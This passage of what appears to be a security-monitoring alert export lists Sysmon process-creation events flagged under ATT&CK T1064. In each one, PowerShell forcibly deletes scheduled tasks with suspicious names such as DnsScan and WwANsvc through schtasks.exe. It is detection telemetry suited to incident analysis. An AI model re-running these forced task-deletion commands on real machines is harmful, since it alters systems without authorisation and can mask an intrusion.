5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.150",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.667 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001075e62100} +ProcessId: 3524 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.674937500Z"",""eventRecordID"":""2832"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.667\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001075e62100}\r\nProcessId: 3524\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.667"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001075e62100}"",""processId"":""3524"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.137",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.590 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001027e42100} +ProcessId: 3196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.606211200Z"",""eventRecordID"":""2831"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.590\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001027e42100}\r\nProcessId: 3196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.590"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001027e42100}"",""processId"":""3196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.107",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.519 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c4e12100} +ProcessId: 7872 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.557957700Z"",""eventRecordID"":""2830"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.519\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c4e12100}\r\nProcessId: 7872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.519"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010c4e12100}"",""processId"":""7872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.456 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001099df2100} +ProcessId: 4844 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.459341600Z"",""eventRecordID"":""2829"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.456\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001099df2100}\r\nProcessId: 4844\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.456"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001099df2100}"",""processId"":""4844"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.398 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c6dd2100} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.439400100Z"",""eventRecordID"":""2828"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.398\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010c6dd2100}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.398"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010c6dd2100}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.057",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.359 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fadb2100} +ProcessId: 6504 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.363998400Z"",""eventRecordID"":""2827"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.359\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010fadb2100}\r\nProcessId: 6504\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.359"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010fadb2100}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.026",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.326 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00103dda2100} +ProcessId: 7896 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 